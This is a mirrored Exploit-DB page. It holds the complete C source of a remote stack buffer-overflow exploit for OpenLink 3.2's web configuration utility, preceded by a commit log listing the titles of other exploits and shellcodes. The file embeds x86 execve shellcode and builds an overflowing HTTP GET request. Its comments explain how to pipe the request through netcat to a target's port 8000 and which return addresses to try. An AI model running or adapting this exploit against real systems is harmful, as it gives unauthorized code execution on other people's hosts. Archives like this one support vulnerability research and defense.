bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/remote/19558.c
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

100 lines
No EOL
3.2 KiB
C
Raw Blame History

// source: https://www.securityfocus.com/bid/720/info
Both the Unix and WindowsNT versions of OpenLink 3.2 are vulnerable to a remotely exploitable buffer overflow attack. The problem is in their web configuration utility, and is the result of an unchecked strcpy() call. The consequence is the execution of arbitrary code on the target host (running the configuration utility) with the priviliges of the web software.
#include <stdio.h>
#include <unistd.h>
/*
* Exploit for Openlink's web configurator for Linux/glibc2
* use: pipe through netcat to openlink web port (8000 default)
* ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000
* makes www_sv execute /usr/bin/wall if you hit the address right
*
* For informational purposes only. This was written to show that
* there's a problem, not for skr1pt k1dd33z --.
* don't ask me for help on how to use this to crack systems,
* help compiling or anything else. It will only compile on
* an x86 compiler however.
*
* Addresses that work for me: 0xbffffb65 (initial run of the broker)
* 0xbffffb85 (all consecutive attempts)
* probably tied to process ID www_sv runs as;
* first try PIDs were in triple digits, others
* 4 digit PIDs.
*
* If this works, generally no more www_sv processes will be run as a side effect.
*/
void test() {
__asm__("
jmp doit
exploit:
# code basically from Aleph One's smash stacking article, with
# minor mods
popl %esi
movb $0xd0, %al # Get a / character into %al
xorb $0xff, %al
movb %al, 0x1(%esi) # drop /s into place
movb %al, 0x5(%esi)
movb %al, 0x9(%esi)
xorl %eax,%eax # clear %eax
movb %eax,0xe(%esi) # drop a 0 at end of string
movl %eax,0x13(%esi) # drop NULL for environment
leal 0x13(%esi),%edx # point %edx to environment
movl %esi,0xf(%esi) # drop pointer to argv
leal 0xf(%esi),%ecx # point %ecx to argv
movl %esi,%ebx # point ebx to command - 1
inc %ebx # fix it to point to the right place
movb $0xb,%al # index to execve syscall
int $0x80 # execute it
xorl %ebx,%ebx # if exec failed, exit nicely...
movl %ebx,%eax
inc %eax
int $0x80
doit:
call exploit
.string \"..usr.bin.wall.\"
");
}
char *shellcode = ((char *)test) + 3;
char code[1000];
int main(int argc, char *argv[])
{
int i;
int left;
unsigned char where[] = {"\0\0\0\0\0"} ;
int *here;
char *dummy;
long addr;
if (argc > 1)
addr = strtoul(argv[1], &dummy, 0);
else
addr = 0xbffffb85;
fprintf(stderr, "Setting address to %8x\n", addr);
*((long *)where) = addr;
strcpy(code, shellcode);
for (i = 0; i < 64; i++) {
strcat(code, where);
}
printf("GET %s\n", code);
exit(0);
}
Reference in a new issue View git blame Copy permalink